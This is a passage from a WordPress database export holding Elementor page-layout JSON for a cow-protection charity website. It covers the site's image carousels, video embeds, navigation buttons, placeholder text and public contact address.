false}},\"elements\":[],\"widgetType\":\"image-carousel\"}],\"isInner\":false},{\"id\":\"0468eb3\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":50,\"margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[],\"isInner\":false}],\"isInner\":false},{\"id\":\"d5b9324\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"e372b45\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"ce9e678\",\"elType\":\"widget\",\"settings\":[],\"elements\":[],\"widgetType\":\"spacer\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"73700aa\",\"elType\":\"section\",\"settings\":{\"content_width\":{\"unit\":\"px\",\"size\":975,\"sizes\":[]},\"structure\":\"20\"},\"elements\":[{\"id\":\"f55311d\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":50},\"elements\":[{\"id\":\"8ea7d73\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/10\\/depositphotos_12743475-stock-photo-farm-cattle.webp\",\"id\":1567,\"alt\":\"\",\"source\":\"library\"},\"thumbnail_size\":\"custom\",\"title_text\":\"Adopt\\/Donate\",\"description_text\":\"Lorem ipsum dolor sit amet, consectetur adipiscing elit. Ut elit tellus, luctus nec ullamcorper mattis, pulvinar dapibus leo.\",\"image_size\":{\"unit\":\"%\",\"size\":100,\"sizes\":[]},\"_background_background\":\"classic\",\"_background_color\":\"#D0FECA\"},\"elements\":[],\"widgetType\":\"image-box\"},{\"id\":\"d6c2143\",\"elType\":\"widget\",\"settings\":{\"text\":\"Click here\",\"align\":\"justify\",\"background_color\":\"#2B3E2D\",\"_margin\":{\"unit\":\"px\",\"top\":\"-19\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"_padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"link\":{\"url\":\"https:\\/\\/gopalak.in\\/adopt-donate\\/\",\"is_external\":\"\",\"nofollow\":\"\",\"custom_attributes\":\"\"}},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false},{\"id\":\"5bb322c\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":50,\"padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"-20\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"9ea7478\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/09\\/banner1.jpg\",\"id\":1340,\"alt\":\"\",\"source\":\"library\"},\"thumbnail_size\":\"custom\",\"title_text\":\"This is the heading\",\"description_text\":\"\\\"Cow is the source of progress and prosperity. In many ways it is superior to one\\u2019s mother\\\"\",\"image_size\":{\"unit\":\"%\",\"size\":100,\"sizes\":[]},\"_background_background\":\"classic\",\"_background_color\":\"#D0FECA\",\"thumbnail_custom_dimension\":{\"width\":\"600\",\"height\":\"400\"}},\"elements\":[],\"widgetType\":\"image-box\"},{\"id\":\"cc6e4e9\",\"elType\":\"widget\",\"settings\":{\"text\":\"Click here\",\"align\":\"justify\",\"background_color\":\"#2B3E2D\",\"_margin\":{\"unit\":\"px\",\"top\":\"-19\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"_padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"link\":{\"url\":\"https:\\/\\/gopalak.in\\/shop\\/\",\"is_external\":\"\",\"nofollow\":\"\",\"custom_attributes\":\"\"}},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"7107c53\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"c67e6d7\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"e70fe37\",\"elType\":\"widget\",\"settings\":[],\"elements\":[],\"widgetType\":\"spacer\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"11aef9e\",\"elType\":\"section\",\"settings\":{\"content_width\":{\"unit\":\"px\",\"size\":904,\"sizes\":[]},\"structure\":\"22\"},\"elements\":[{\"id\":\"2d9f268\",\"elType\":\"column\",\"settings\":{\"_column_size\":66,\"_inline_size\":null},\"elements\":[{\"id\":\"86a6968\",\"elType\":\"widget\",\"settings\":{\"title\":\"About Gopalak\",\"title_color\":\"#264D5D\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"aa78264\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>Gopalak is committed to work with a dedicated mission of Cow Protection and Avail people to cow importance to the world. the cow is the mother of mothers since it has the ability to feed, provide and support humanity in many ways.<br \\/>Goplak is working towards to helping to goshalas and supporting to goshalas product for cows well being<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"67983f0\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"8e299f1\",\"elType\":\"widget\",\"settings\":{\"text\":\"Click here\",\"align\":\"justify\",\"background_color\":\"#324735\",\"_margin\":{\"unit\":\"px\",\"top\":\"49\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"link\":{\"url\":\"https:\\/\\/gopalak.in\\/about-us\\/\",\"is_external\":\"\",\"nofollow\":\"\",\"custom_attributes\":\"\"}},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"23d3073\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"7d36be0\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"e43f473\",\"elType\":\"widget\",\"settings\":{\"space\":{\"unit\":\"px\",\"size\":71,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"spacer\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"1c1c876\",\"elType\":\"section\",\"settings\":{\"structure\":\"30\",\"background_background\":\"classic\",\"background_color\":\"#D8CDCD52\"},\"elements\":[{\"id\":\"4b90a4b\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"dee4139\",\"elType\":\"widget\",\"settings\":{\"youtube_url\":\"https:\\/\\/www.youtube.com\\/watch?v=0wll4Km5AU8\",\"vimeo_url\":\"https:\\/\\/vimeo.com\\/235215203\",\"dailymotion_url\":\"https:\\/\\/www.dailymotion.com\\/video\\/x6tqhqb\"},\"elements\":[],\"widgetType\":\"video\"}],\"isInner\":false},{\"id\":\"97c7ffb\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"f586793\",\"elType\":\"widget\",\"settings\":{\"youtube_url\":\"https:\\/\\/www.youtube.com\\/watch?v=bEyCT3KsAMQ\",\"vimeo_url\":\"https:\\/\\/vimeo.com\\/235215203\",\"dailymotion_url\":\"https:\\/\\/www.dailymotion.com\\/video\\/x6tqhqb\"},\"elements\":[],\"widgetType\":\"video\"}],\"isInner\":false},{\"id\":\"2f0ac23\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"ec43a70\",\"elType\":\"widget\",\"settings\":{\"youtube_url\":\"https:\\/\\/www.youtube.com\\/watch?v=sVQg0-3WSc4\",\"vimeo_url\":\"https:\\/\\/vimeo.com\\/235215203\",\"dailymotion_url\":\"https:\\/\\/www.dailymotion.com\\/video\\/x6tqhqb\"},\"elements\":[],\"widgetType\":\"video\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"ca8c599\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"f8ca017\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"da25a76\",\"elType\":\"widget\",\"settings\":[],\"elements\":[],\"widgetType\":\"spacer\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"216af8d\",\"elType\":\"section\",\"settings\":{\"structure\":\"21\"},\"elements\":[{\"id\":\"882c92e\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"772bd0e\",\"elType\":\"widget\",\"settings\":{\"title\":\"Gallery\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"fbf7c50\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>\\\"Cow is the source of progress and prosperity. In many ways it is superior to one\\u2019s mother\\\"<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"2c59178\",\"elType\":\"column\",\"settings\":{\"_column_size\":66,\"_inline_size\":null},\"elements\":[{\"id\":\"29d5b45\",\"elType\":\"widget\",\"settings\":{\"carousel\":[{\"id\":1340,\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/09\\/banner1.jpg\"},{\"id\":1354,\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/09\\/istockphoto-1221688781-612x612-1.jpg\"},{\"id\":1339,\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/09\\/cows-farming-on-green-meadow-260nw-1704884002-e1663753177624.webp\"},{\"id\":1355,\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/09\\/803471.jpg\"},{\"id\":1357,\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/09\\/279356.webp\"}],\"autoplay_speed\":1000},\"elements\":[],\"widgetType\":\"image-carousel\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"f9dd695\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"0f89775\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"66d5270\",\"elType\":\"widget\",\"settings\":[],\"elements\":[],\"widgetType\":\"spacer\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"ba24d1d\",\"elType\":\"section\",\"settings\":{\"layout\":\"full_width\",\"background_background\":\"slideshow\",\"background_image\":{\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/10\\/values.png\",\"id\":1654,\"alt\":\"\",\"source\":\"library\"},\"background_slideshow_gallery\":[{\"id\":1577,\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/10\\/GOPALAK55.png\"},{\"id\":1544,\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/10\\/gopalak-B1-copy.jpg\"}],\"padding\":{\"unit\":\"px\",\"top\":\"150\",\"right\":\"0\",\"bottom\":\"0150\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"5007eb7\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"c7f7d6b\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"\",\"id\":\"\",\"alt\":\"\",\"source\":\"library\"},\"image_size\":\"full\",\"_margin\":{\"unit\":\"px\",\"top\":\"-10\",\"right\":\"0\",\"bottom\":\"-10\",\"left\":\"-10\",\"isLinked\":false}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"7410379\",\"elType\":\"section\",\"settings\":{\"background_background\":\"classic\",\"background_color\":\"#001B06\",\"margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":0,\"bottom\":\"0\",\"left\":0,\"isLinked\":false}},\"elements\":[{\"id\":\"b43ead7\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"5282e6a\",\"elType\":\"widget\",\"settings\":{\"title\":\"Address\",\"header_size\":\"h4\",\"title_color\":\"#FFFFFF\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"6d3c6b7\",\"elType\":\"widget\",\"settings\":{\"title\":\" #800 Spandana towers\\n<br>19th main roadr,  HSR Layout<br>2nd sector, near golden fresh super market<br>Bangalore, 560102<br>\\nContact : (+91)7411722844<br>\\nE-mail id: namaste@gopalak.in\\n\",\"header_size\":\"span\",\"title_color\":\"#FFFFFF\"},\"elements\":[],\"widgetType\":\"heading\"}],\"isInner\":false}],\"isInner\":false}]'),(10591,1761,'_elementor_page_assets','a:0:{}'),(10602,1763,'_elementor_edit_mode','builder'),(10603,1763,'_elementor_template_type','wp-page'),(10604,1763,'_elementor_version','3.7.8'),(10605,1763,'_wp_page_template','elementor_canvas'),(10606,1763,'_elementor_data','[{\"id\":\"2bcecd0\",\"elType\":\"section\",\"settings\":{\"structure\":\"70\",\"background_background\":\"classic\",\"background_color\":\"#006505\",\"margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":0,\"bottom\":\"0\",\"left\":0,\"isLinked\":false},\"padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"-47\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"08c3f0f\",\"elType\":\"column\",\"settings\":{\"_column_size\":14,\"_inline_size\":null},\"elements\":[{\"id\":\"98c2def\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/10\\/logo1211.png\",\"id\":1615,\"alt\":\"\",\"source\":\"library\"},\"image_size\":\"thumbnail\",\"image_custom_dimension\":{\"width\":\"75\",\"height\":\"75\"},\"link_to\":\"custom\",\"width\":{\"unit\":\"%\",\"size\":87,\"sizes\":[]},\"height\":{\"unit\":\"px\",\"size\":99,\"sizes\":[]},\"_padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"3439158\",\"elType\":\"column\",\"settings\":{\"_column_size\":14,\"_inline_size\":null},\"elements\":[],\"isInner\":false},{\"id\":\"f29b88a\",\"elType\":\"column\",\"settings\":{\"_column_size\":14,\"_inline_size\":null,\"margin\":{\"unit\":\"px\",\"top\":\"30\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"049c5ad\",\"elType\":\"widget\",\"settings\":{\"text\":\"Home\",\"link\":{\"url\":\"https:\\/\\/gopalak.in\\/\",\"is_external\":\"\",\"nofollow\":\"\",\"custom_attributes\":\"\"},\"align\":\"justify\",\"size\":\"xs\",\"background_color\":\"#7EB081\",\"icon_indent\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false},{\"id\":\"5af2fa6\",\"elType\":\"column\",\"settings\":{\"_column_size\":14,\"_inline_size\":null,\"margin\":{\"unit\":\"px\",\"top\":\"30\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"59347f6\",\"elType\":\"widget\",\"settings\":{\"text\":\"shop\",\"link\":{\"url\":\"https:\\/\\/gopalak.in\\/shop\\/\",\"is_external\":\"\",\"nofollow\":\"\",\"custom_attributes\":\"\"},\"align\":\"justify\",\"size\":\"xs\",\"background_color\":\"#7EB081\"},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false},{\"id\":\"db735bc\",\"elType\":\"column\",\"settings\":{\"_column_size\":14,\"_inline_size\":null},\"elements\":[{\"id\":\"27f86d0\",\"elType\":\"widget\",\"settings\":{\"text\":\"Adopt\\/Donate\",\"link\":{\"url\":\"https:\\/\\/gopalak.in\\/adopt-donate\\/\",\"is_external\":\"\",\"nofollow\":\"\",\"custom_attributes\":\"\"},\"align\":\"justify\",\"size\":\"xs\",\"background_color\":\"#7EB081\",\"_margin\":{\"unit\":\"px\",\"top\":\"30\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false},{\"id\":\"4613375\",\"elType\":\"column\",\"settings\":{\"_column_size\":14,\"_inline_size\":null},\"elements\":[{\"id\":\"36373ca\",\"elType\":\"widget\",\"settings\":{\"text\":\"About us\",\"link\":{\"url\":\"https:\\/\\/gopalak.in\\/about-us\\/\",\"is_external\":\"\",\"nofollow\":\"\",\"custom_attributes\":\"\"},\"align\":\"justify\",\"size\":\"xs\",\"background_color\":\"#7EB081\",\"_margin\":{\"unit\":\"px\",\"top\":\"30\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false},{\"id\":\"b366bab\",\"elType\":\"column\",\"settings\":{\"_column_size\":14,\"_inline_size\":null},\"elements\":[{\"id\":\"4c45b22\",\"elType\":\"widget\",\"settings\":{\"text\":\"My Account\",\"link\":{\"url\":\"https:\\/\\/gopalak.in\\/my-account\\/\",\"is_external\":\"\",\"nofollow\":\"\",\"custom_attributes\":\"\"},\"align\":\"justify\",\"size\":\"xs\",\"icon_indent\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]},\"background_color\":\"#7EB081\",\"_margin\":{\"unit\":\"px\",\"top\":\"30\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"574c840\",\"elType\":\"section\",\"settings\":{\"layout\":\"full_width\",\"structure\":\"20\",\"background_background\":\"classic\",\"background_image\":{\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/10\\/Frame.png\",\"id\":1693,\"alt\":\"\",\"source\":\"library\"},\"background_repeat\":\"no-repeat\",\"background_size\":\"initial\",\"padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"-3\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"84647ad\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":50},\"elements\":[{\"id\":\"4e75547\",\"elType\":\"widget\",\"settings\":{\"carousel\":[{\"id\":1690,\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/10\\/pexels-mark-stebnicki-2602864-scaled.jpg\"},{\"id\":1689,\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/10\\/pexels-kat-smith-735976-scaled.jpg\"},{\"id\":1691,\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/10\\/pexels-mark-stebnicki-2252557-scaled.jpg\"},{\"id\":1741,\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/10\\/pexels-min-an-1455455-scaled.jpg\"},{\"id\":1742,\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/10\\/pexels-roman-odintsov-8747798-scaled.jpg\"},{\"id\":1687,\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/10\\/pexels-kelly-2881385-scaled.jpg\"}],\"thumbnail_size\":\"full\",\"slides_to_show\":\"1\",\"navigation\":\"none\",\"autoplay_speed\":1000,\"_margin\":{\"unit\":\"px\",\"top\":\"-10\",\"right\":\"12\",\"bottom\":\"-21\",\"left\":\"-12\",\"isLinked\":false}},\"elements\":[],\"widgetType\":\"image-carousel\"}],\"isInner\":false},{\"id\":\"0468eb3\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":50,\"margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[],\"isInner\":false}],\"isInner\":false},{\"id\":\"d5b9324\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"e372b45\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"ce9e678\",\"elType\":\"widget\",\"settings\":[],\"elements\":[],\"widgetType\":\"spacer\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"73700aa\",\"elType\":\"section\",\"settings\":{\"content_width\":{\"unit\":\"px\",\"size\":975,\"sizes\":[]},\"structure\":\"20\"},\"elements\":[{\"id\":\"f55311d\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":50},\"elements\":[{\"id\":\"8ea7d73\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/10\\/depositphotos_12743475-stock-photo-farm-cattle.webp\",\"id\":1567,\"alt\":\"\",\"source\":\"library\"},\"thumbnail_size\":\"custom\",\"title_text\":\"Adopt\\/Donate\",\"description_text\":\"Lorem ipsum dolor sit amet, consectetur adipiscing elit. Ut elit tellus, luctus nec ullamcorper mattis, pulvinar dapibus leo.\",\"image_size\":{\"unit\":\"%\",\"size\":100,\"sizes\":[]},\"_background_background\":\"classic\",\"_background_color\":\"#D0FECA\"},\"elements\":[],\"widgetType\":\"image-box\"},{\"id\":\"d6c2143\",\"elType\":\"widget\",\"settings\":{\"text\":\"Click here\",\"align\":\"justify\",\"background_color\":\"#2B3E2D\",\"_margin\":{\"unit\":\"px\",\"top\":\"-19\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"_padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"link\":{\"url\":\"https:\\/\\/gopalak.in\\/adopt-donate\\/\",\"is_external\":\"\",\"nofollow\":\"\",\"custom_attributes\":\"\"}},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false},{\"id\":\"5bb322c\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":50,\"padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"-20\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"9ea7478\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/09\\/banner1.jpg\",\"id\":1340,\"alt\":\"\",\"source\":\"library\"},\"thumbnail_size\":\"custom\",\"title_text\":\"This is the heading\",\"description_text\":\"\\\"Cow is the source of progress and prosperity. In many ways it is superior to one\\u2019s mother\\\"\",\"image_size\":{\"unit\":\"%\",\"size\":100,\"sizes\":[]},\"_background_background\":\"classic\",\"_background_color\":\"#D0FECA\",\"thumbnail_custom_dimension\":{\"width\":\"600\",\"height\":\"400\"}},\"elements\":[],\"widgetType\":\"image-box\"},{\"id\":\"cc6e4e9\",\"elType\":\"widget\",\"settings\":{\"text\":\"Click here\",\"align\":\"justify\",\"background_color\":\"#2B3E2D\",\"_margin\":{\"unit\":\"px\",\"top\":\"-19\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"_padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"link\":{\"url\":\"https:\\/\\/gopalak.in\\/shop\\/\",\"is_external\":\"\",\"nofollow\":\"\",\"custom_attributes\":\"\"}},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"7107c53\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"c67e6d7\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"e70fe37\",\"elType\":\"widget\",\"settings\":[],\"elements\":[],\"widgetType\":\"spacer\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"11aef9e\",\"elType\":\"section\",\"settings\":{\"content_width\":{\"unit\":\"px\",\"size\":904,\"sizes\":[]},\"structure\":\"22\"},\"elements\":[{\"id\":\"2d9f268\",\"elType\":\"column\",\"settings\":{\"_column_size\":66,\"_inline_size\":null},\"elements\":[{\"id\":\"86a6968\",\"elType\":\"widget\",\"settings\":{\"title\":\"About Gopalak\",\"title_color\":\"#264D5D\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"aa78264\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>Gopalak is committed to work with a dedicated mission of Cow Protection and Avail people to cow importance to the world. the cow is the mother of mothers since it has the ability to feed, provide and support humanity in many ways.<br \\/>Goplak is working towards to helping to goshalas and supporting to goshalas product for cows well being<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"67983f0\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"8e299f1\",\"elType\":\"widget\",\"settings\":{\"text\":\"Click here\",\"align\":\"justify\",\"background_color\":\"#324735\",\"_margin\":{\"unit\":\"px\",\"top\":\"49\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"link\":{\"url\":\"https:\\/\\/gopalak.in\\/about-us\\/\",\"is_external\":\"\",\"nofollow\":\"\",\"custom_attributes\":\"\"}},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"23d3073\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"7d36be0\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"e43f473\",\"elType\":\"widget\",\"settings\":{\"space\":{\"unit\":\"px\",\"size\":71,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"spacer\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"1c1c876\",\"elType\":\"section\",\"settings\":{\"structure\":\"30\",\"background_background\":\"classic\",\"background_color\":\"#D8CDCD52\"},\"elements\":[{\"id\":\"4b90a4b\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"dee4139\",\"elType\":\"widget\",\"settings\":{\"youtube_url\":\"https:\\/\\/www.youtube.com\\/watch?v=0wll4Km5AU8\",\"vimeo_url\":\"https:\\/\\/vimeo.com\\/235215203\",\"dailymotion_url\":\"https:\\/\\/www.dailymotion.com\\/video\\/x6tqhqb\"},\"elements\":[],\"widgetType\":\"video\"}],\"isInner\":false},{\"id\":\"97c7ffb\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"f586793\",\"elType\":\"widget\",\"settings\":{\"youtube_url\":\"https:\\/\\/www.youtube.com\\/watch?v=bEyCT3KsAMQ\",\"vimeo_url\":\"https:\\/\\/vimeo.com\\/235215203\",\"dailymotion_url\":\"https:\\/\\/www.dailymotion.com\\/video\\/x6tqhqb\"},\"elements\":[],\"widgetType\":\"video\"}],\"isInner\":false},{\"id\":\"2f0ac23\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"ec43a70\",\"elType\":\"widget\",\"settings\":{\"youtube_url\":\"https:\\/\\/www.youtube.com\\/watch?v=sVQg0-3WSc4\",\"vimeo_url\":\"https:\\/\\/vimeo.com\\/235215203\",\"dailymotion_url\":\"https:\\/\\/www.dailymotion.com\\/video\\/x6tqhqb\"},\"elements\":[],\"widgetType\":\"video\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"ca8c599\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"f8ca017\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"da25a76\",\"elType\":\"widget\",\"settings\":[],\"elements\":[],\"widgetType\":\"spacer\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"216af8d\",\"elType\":\"section\",\"settings\":{\"structure\":\"21\"},\"elements\":[{\"id\":\"882c92e\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"772bd0e\",\"elType\":\"widget\",\"settings\":{\"title\":\"Gallery\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"fbf7c50\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>\\\"Cow is the source of progress and prosperity. In many ways it is superior to one\\u2019s mother\\\"<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"2c59178\",\"elType\":\"column\",\"settings\":{\"_column_size\":66,\"_inline_size\":null},\"elements\":[{\"id\":\"29d5b45\",\"elType\":\"widget\",\"settings\":{\"carousel\":[{\"id\":1340,\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/09\\/banner1.jpg\"},{\"id\":1354,\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/09\\/istockphoto-1221688781-612x612-1.jpg\"},{\"id\":1339,\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/09\\/cows-farming-on-green-meadow-260nw-1704884002-e1663753177624.webp\"},{\"id\":1355,\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/09\\/803471.jpg\"},{\"id\":1357,\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/09\\/279356.webp\"}],\"autoplay_speed\":1000},\"elements\":[],\"widgetType\":\"image-carousel\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"f9dd695\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"0f89775\",\"elType\":\"column\",\"